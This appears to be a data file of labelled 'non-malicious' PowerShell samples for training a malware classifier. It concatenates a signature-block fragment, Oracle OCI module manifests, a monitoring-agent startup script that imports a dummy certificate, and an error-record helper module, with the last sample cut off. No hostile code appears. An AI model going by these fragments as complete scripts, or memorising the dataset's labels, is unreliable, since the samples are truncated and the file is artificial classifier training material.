# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDlprSrtu+YrieDenReby603
# HbyWDi5YzM7UQ1RV9o19MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAAbPn3QU2O/P8ks8EqVDr7MrKhXLfdWc3e5zd1Bm0aEtVsKdnii22HTEe
# xyAL1QxojoNjqh52t804XIU0/MYyhXPElfzUeM3FawdwzfleVd0OC+5HHIdG6Rrc
# 9QrihCPPRxUWP1yTPxtNfCjpl3+B+jz05yn5UExJCV15WhQcKG0CidxXlveJnIEf
# zm3nvpCSzoCr4Jofj5iEijAON7a2gLgXFWzGTgDw+WzqD/oHOrR4KYxf+/Mkuodp
# XtRpyzqGv8rIKcsI2ZqZD4ZoBdHon+oJz0E/UYnHgcTRR0gZE4Cw6s8CcaLv51QK
# REMZRQ38Apa7Tbpg30PuW2vv5hOiJaGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC
# F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBUp5w2XXbZ8qBpCVjUW2tljBPFR97m4OHEvxTMPOe/2wIGZxp39n9T
# GBMyMDI0MTAyODExNDA0MC43MDdaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHtMIIHIDCCBQigAwIBAgITMwAAAecujy+TC08b6QABAAAB5zANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# MTlaFw0yNTAzMDUxODQ1MTlaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDCV58v4IuQ659XPM1DtaWMv9/HRUC5kdiEF89YBP6/
# Rn7kjqMkZ5ESemf5Eli4CLtQVSefRpF1j7S5LLKisMWOGRaLcaVbGTfcmI1vMRJ1
# tzMwCNIoCq/vy8WH8QdV1B/Ab5sK+Q9yIvzGw47TfXPE8RlrauwK/e+nWnwMt060
# akEZiJJz1Vh1LhSYKaiP9Z23EZmGETCWigkKbcuAnhvh3yrMa89uBfaeHQZEHGQq
# dskM48EBcWSWdpiSSBiAxyhHUkbknl9PPztB/SUxzRZjUzWHg9bf1mqZ0cIiAWC0
# EjK7ONhlQfKSRHVLKLNPpl3/+UL4Xjc0Yvdqc88gOLUr/84T9/xK5r82ulvRp2A8
# /ar9cG4W7650uKaAxRAmgL4hKgIX5/0aIAsbyqJOa6OIGSF9a+DfXl1LpQPNKR79
# 2scF7tjD5WqwIuifS9YUiHMvRLjjKk0SSCV/mpXC0BoPkk5asfxrrJbCsJePHSOE
# blpJzRmzaP6OMXwRcrb7TXFQOsTkKuqkWvvYIPvVzC68UM+MskLPld1eqdOOMK7S
# bbf2tGSZf3+iOwWQMcWXB9gw5gK3AIYK08WkJJuyzPqfitgubdRCmYr9CVsNOuW+
# wHDYGhciJDF2LkrjkFUjUcXSIJd9f2ssYitZ9CurGV74BQcfrxjvk1L8jvtN7mul
# IwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM/+4JiAnzY4dpEf/Zlrh1K73o9YMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB0ofDbk+llWi1cC6nsfie5Jtp09o6b6ARC
# pvtDPq2KFP+hi+UNNP7LGciKuckqXCmBTFIhfBeGSxvk6ycokdQr3815pEOaYWTn
# HvQ0+8hKy86r1F4rfBu4oHB5cTy08T4ohrG/OYG/B/gNnz0Ol6v7u/qEjz48zXZ6
# ZlxKGyZwKmKZWaBd2DYEwzKpdLkBxs6A6enWZR0jY+q5FdbV45ghGTKgSr5ECAOn
# LD4njJwfjIq0mRZWwDZQoXtJSaVHSu2lHQL3YHEFikunbUTJfNfBDLL7Gv+sTmRi
# DZky5OAxoLG2gaTfuiFbfpmSfPcgl5COUzfMQnzpKfX6+FkI0QQNvuPpWsDU8sR+
# uni2VmDo7rmqJrom4ihgVNdLaMfNUqvBL5ZiSK1zmaELBJ9a+YOjE5pmSarW5sGb
# n7iVkF2W9JQIOH6tGWLFJS5Hs36zahkoHh8iD963LeGjZqkFusKaUW72yMj/yxTe
# GEDOoIr35kwXxr1Uu+zkur2y+FuNY0oZjppzp95AW1lehP0xaO+oBV1XfvaCur/B
# 5PVAp2xzrosMEUcAwpJpio+VYfIufGj7meXcGQYWA8Umr8K6Auo+Jlj8IeFS6lSv
# KhqQpmdBzAMGqPOQKt1Ow3ZXxehK7vAiim3ZiALlM0K546k0sZrxdZPgpmz7O8w9
# gHLuyZAQezCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ
# MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCz
# cgTnGasSwe/dru+cPe1NF/vwQ6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smTdjAiGA8yMDI0MTAyODA0Mzcx
# MFoYDzIwMjQxMDI5MDQzNzEwWjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqyZN2
# AgEAMAoCAQACAgsfAgH/MAcCAQACAhSeMAoCBQDqyuT2AgEAMDYGCisGAQQBhFkK
# BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ
# KoZIhvcNAQELBQADggEBAACu8K1erSG3WA+KFwBfZzinNGLPeJwLYnFLBSgW0x8b
# Vs9wv8pBHL2TK6Pe23xtA/0uCwDBh6P5fC2xQb1j36fFn4yH74aFvokpslhV4n1k
# KIE8LqhplPRpGriSZ+s07DcVOeLDZ8jRV5RkN3/8myyj76R5HSgyZastSefkWLKh
# dgv1pa1yD8l6NbtcI69W0Viwz4WdjgqLTwtASbKYSOWtSz0xycvyKPGMldl/P7yr
# DnTw5N916Uubpcaa2OOV/GP1RGATQZoGg3+zPuKYYn2CEPlS/wpUPG/n2c5x80jT
# 3Rlh8SXd7wZxaZ9KVgMTavWz6I0tYfwtNUTabE9ovWkxggQNMIIECQIBATCBkzB8
# MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk
# bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
# aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAecujy+TC08b6QABAAAB
# 5zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE
# MC8GCSqGSIb3DQEJBDEiBCAf3CinXTSra/NCzujsM6vnOLIPuZp6A9P9nEhRKnUh
# XzCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIOU2XQ12aob9DeDFXM9UFHeE
# X74Fv0ABvQMG7qC51nOtMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB
# IDIwMTACEzMAAAHnLo8vkwtPG+kAAQAAAecwIgQgfk7yL/Fg+qwMxB83yRNFNNOG
# Ba29IheaFT2QvafHnF0wDQYJKoZIhvcNAQELBQAEggIAVekjOr1UGfKpLUXQPb5K
# wGAAkdk5eZTw5xyF6JZ5/En/i18CjypQnGbS8gG7Kq3MiMfsctcpyIat5E6u81JM
# yrjZcRLuz+A76bubITb0e/Eq2xeZ3bTRjTL086l7sXKhx26fN85AoScPkjfTsrrk
# Ig3+RYbBdmNEdhhfHOHPq0CHLK3lcGrnVAvcqD6ys1ZaGwQziIkmLtsd4qugxz+b
# pBSPcWdGmOGb8VGnOiF+irkBzebnkq5+O2QlLoYGIqxpWxx+kctiRNjDs0S4n7YL
# GEhVP8yhA2kuod13CxURGx0rX0UlDKZefvzle3gjIqnnwYo90q5ruyIprF82M2ei
# 1GemGfviItCD6PPTB5UfnzPgrrGf1+LcLPSYWHN1kPHGO2fZcjCk06lcXhRNueEL
# 6a9qMtdeIHWgLK9VHQoannyZ2XMzHxKUj/DGFOMItiJRaGLyy/azZrEKpR0TNUhn
# bbM+ujToHL6D7rtydONMLTk9MyU3xk+HLzRBQG7K3RtHahwQ7tYhOQfOeVZIi2s7
# pCoEohY8gqTbkxIGYve3PWwlGQr5IT+QSQysq+k3X/KXB0Eu0VkBD3TcZoPYza2j
# jjFETbHNGB6FWeebnJxjOUEAnGn9/Zx0bUYMEzu2uQBNtrVnwzgyeIEYcAnRzUeR
# h6Oya+MkMPkqSBloHkRfGtc=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_25_1.ps1
|
sample_25_1.ps1
|
#
# Module manifest for module 'OCI.PSModules.Apigateway'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Apigateway.dll'
# Version number of this module.
ModuleVersion = '77.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '6afcef29-4171-4ad7-a267-5ec2cf2367ad'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Apigateway Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '77.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Apigateway.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIApigatewayApi', 'Get-OCIApigatewayApiContent',
'Get-OCIApigatewayApiDeploymentSpecification',
'Get-OCIApigatewayApisList', 'Get-OCIApigatewayApiValidations',
'Get-OCIApigatewayCertificate', 'Get-OCIApigatewayCertificatesList',
'Get-OCIApigatewayDeployment', 'Get-OCIApigatewayDeploymentsList',
'Get-OCIApigatewayGateway', 'Get-OCIApigatewayGatewaysList',
'Get-OCIApigatewaySdk', 'Get-OCIApigatewaySdkLanguageTypesList',
'Get-OCIApigatewaySdksList', 'Get-OCIApigatewaySubscriber',
'Get-OCIApigatewaySubscribersList', 'Get-OCIApigatewayUsagePlan',
'Get-OCIApigatewayUsagePlansList', 'Get-OCIApigatewayWorkRequest',
'Get-OCIApigatewayWorkRequestErrorsList',
'Get-OCIApigatewayWorkRequestLogsList',
'Get-OCIApigatewayWorkRequestsList',
'Move-OCIApigatewayApiCompartment',
'Move-OCIApigatewayCertificateCompartment',
'Move-OCIApigatewayDeploymentCompartment',
'Move-OCIApigatewayGatewayCompartment',
'Move-OCIApigatewaySubscriberCompartment',
'Move-OCIApigatewayUsagePlanCompartment', 'New-OCIApigatewayApi',
'New-OCIApigatewayCertificate', 'New-OCIApigatewayDeployment',
'New-OCIApigatewayGateway', 'New-OCIApigatewaySdk',
'New-OCIApigatewaySubscriber', 'New-OCIApigatewayUsagePlan',
'Remove-OCIApigatewayApi', 'Remove-OCIApigatewayCertificate',
'Remove-OCIApigatewayDeployment', 'Remove-OCIApigatewayGateway',
'Remove-OCIApigatewaySdk', 'Remove-OCIApigatewaySubscriber',
'Remove-OCIApigatewayUsagePlan', 'Stop-OCIApigatewayWorkRequest',
'Update-OCIApigatewayApi', 'Update-OCIApigatewayCertificate',
'Update-OCIApigatewayDeployment', 'Update-OCIApigatewayGateway',
'Update-OCIApigatewaySdk', 'Update-OCIApigatewaySubscriber',
'Update-OCIApigatewayUsagePlan'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Apigateway'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_24_61.ps1
|
sample_24_61.ps1
|
$env:CONFIG_PATH = ".\config/config.test.json"
$serviceConfig = Get-Content -Raw -Path $env:CONFIG_PATH | ConvertFrom-Json
Write-Host "Set variables for monitoring agent..."
$env:MONITORING_BUILD_VERSION = "0.0.0"
$env:MONITORING_CONFIG_VERSION = $serviceConfig.'Geneva:ConfigVersion'
$env:MONITORING_GCS_ACCOUNT = $serviceConfig.'Geneva:Account'
$env:MONITORING_GCS_CERTSTORE = "LOCAL_MACHINE\MY"
$env:MONITORING_GCS_ENVIRONMENT = $serviceConfig.'Geneva:Environment'
$env:MONITORING_GCS_NAMESPACE = $serviceConfig.'Geneva:Namespace'
$env:MONITORING_GCS_THUMBPRINT = $serviceConfig.'Geneva:Thumbprint'
$env:MONITORING_MDM_ACCOUNT = $serviceConfig.'Geneva:Mdm:Account'
$env:MONITORING_MDM_NAMESPACE = $serviceConfig.'Geneva:Mdm:Namespace'
$env:MONITORING_ROLE = $serviceConfig.'Deployment:Role'
$env:MONITORING_ROLE_INSTANCE = $serviceConfig.'Geneva:RoleInstance'
$env:MONITORING_ROLE_DEPLOYMENT_REGION = $serviceConfig.'Geneva:RoleDeploymentRegion'
$env:MONITORING_TENANT= $serviceConfig.'Geneva:Tenant'
$env:MONITORING_GCS_REGION = $serviceConfig.'Geneva:GcsRegion'
Write-Host "Set variables for monitoring agent successfully. Environment variables:"
Get-Childitem env:
# To use authentic Geneva cert, uncomment below
# $secretConfigPath = $env:CONFIG_PATH
# $appEntryPoint = "./$projectname$.exe --configPath $($env:CONFIG_PATH)"
# ./CosmicStartupScripts/OwinCosmicEntryPoint.ps1 `
# -AppEntryPoint $appEntryPoint `
# -SecretsConfigPath $secretConfigPath `
# -MonitoringAgentCertName "GENEVA" `
# -MtlsPorts 8080
# To use dummy Geneva cert, uncomment below
Import-PfxCertificate -FilePath ./cosmicvsix-dummy-geneva.pfx -CertStoreLocation Cert:\LocalMachine\My
[Environment]::SetEnvironmentVariable("Secret_GENEVA_Thumbprint", $serviceConfig.'Geneva:Thumbprint', "Machine")
Import-Module ./CosmicStartupScripts/MonitoringAgent
$monitoringAgent = New-MonitoringAgent "GENEVA"
$monitoringAgent.Start()
./$projectname$.exe --configPath $($env:CONFIG_PATH)
|
combined_dataset/train/non-malicious/ModuleWriteError_1.psm1.ps1
|
ModuleWriteError_1.psm1.ps1
|
################################################################################
## Script Name: Module Write Error
## Created On: 1/7/2010
## Author: Thell Fowler
## Tribute: Joel 'Jaykul' Bennet
## File: ModuleWriteError.psm1
## Usage: import-module \\Path\\to\\module\\ModuleWriteError.psm1
## Version: 1.0.0
##
## Purpose: Provides a New-ModuleError functions for the creation of an
## error record that is populated and formatted with an
## imported module's advanced function information.
##
## Reasoning: Informational error messages generated from 'Write-Error' do
## not truly represent the current function in some cases and
## do not inform the user of Module specific details.
## Usage of $PSCmdlet.WriteError an error record from
## New-ModuleError can resolve that.
##
## Requirements: PowerShell Version 2
## ModuleWriteError.psd1
## FunctionInfo.types.ps1xml
## Last Updated: 01/13/2010
## History:
## 1.0.1 01/13/2010 - Removed nested prompt call remaining from testing.
## 1.0.0 01/13/2010 - Initial version.
##
##
################################################################################
#requires -version 2.0
Set-StrictMode -Version 2
function New-ModuleExceptionClass{
[CmdletBinding()]
param([string]$exceptionType)
# Generic Default Exception Class for use with WriteError output.
$GenericModuleExceptionSource = @"
using System;
public class $($exceptionType) : System.ApplicationException
{
public $($exceptionType)()
{
}
public $($exceptionType)(string message) : base(message)
{
}
public $($exceptionType)(string message, Exception innerException)
: base(message, innerException)
{
}
}
"@
# Suppresses warning: Generated type defines no public methods of it's own.
Add-Type -TypeDefinition $GenericModuleExceptionSource -IgnoreWarnings -warningaction silentlycontinue
}
function New-ModuleError {
<#
.SYNOPSIS
Create an error record that is populated and formatted to provide data
that is contextual to an imported module's advanced functions.
.DESCRIPTION
Informational error messages generated from 'Write-Error' do not truly
represent the current function in some cases and do not inform the user
of Module specific details. When using $PSCmdlet.WriteError though that
data can be populated into the error record.
.EXAMPLE
$PSCmdlet.WriteError((
New-ModuleError `
"Cannot get `'$Name`' because it does not exist."
))
.OUTPUTS
[ErrorRecord]
#>
[CmdletBinding()]
param(
[Parameter(Position=0, Mandatory=$true)]
[string]$message,
[string]$identifierText = $("ErrorNotSpecified"),
[System.Management.Automation.ErrorCategory]$ErrorCategory = $("NotSpecified"),
[PSObject]$targetObject,
[string]$exceptionType = $($null),
[Exception]$innerException
)
Begin {
# These are used in building the error record.
$MyCommandCaller = ((get-pscallstack)[1].InvocationInfo.MyCommand)
$MyCallersModule = ($MyCommandCaller.ModuleName)
if ( $exceptionType.Length -eq 0 ) {
$exceptionType = "$($MyCallersModule)ModuleException"
} elseif ( ( "$($exceptionType)" -as [type] -eq $null ) -and
( $exceptionType -ne "$($MyCallersModule)ModuleException" ) ) {
$exceptionType = [AppDomain]::CurrentDomain.GetAssemblies() | %{$_.GetExportedTypes()} |
?{ $_.Name -eq "$($exceptionType)" -and $_.IsSubclassOf( [System.Exception] ) }
if ( $exceptionType -as [type] -eq $null ) {
$exceptionType = "$($MyCallersModule)ModuleException"
}
}
if ( ( $exceptionType -eq "$($MyCallersModule)ModuleException" ) -and
( "$($exceptionType)" -as [type] -eq $null) ) {
New-ModuleExceptionClass "$($MyCallersModule)ModuleException"
}
}
Process {
if ($innerException) {
$MyErrorRecord = (new-object System.Management.Automation.ErrorRecord(
(new-object $exceptionType("$($message)", $innerException)),
"$($identifierText), Module : $($MyCommandCaller.ModuleName)\\$($MyCommandCaller.InternalName)",
$ErrorCategory,
$targetObject)
)
} else {
$MyException = new-object $exceptionType $message
$MyErrorRecord = (new-object System.Management.Automation.ErrorRecord(
$MyException,
"$($identifierText), Module : $($MyCommandCaller.ModuleName)\\$($MyCommandCaller.InternalName)",
$ErrorCategory,
$targetObject)
)
}
$MyErrorRecord.CategoryInfo.Activity = "$($MyCommandCaller.Name)"
Write-Output $MyErrorRecord
}
End {
}
}
Export-ModuleMember New-ModuleError
|
combined_dataset/train/non-malicious/sample_21_99.ps1
|
sample_21_99.ps1
|
#
# Module manifest for module 'OCI.PSModules.Secrets'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Secrets.dll'
# Version number of this module.
ModuleVersion = '82.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
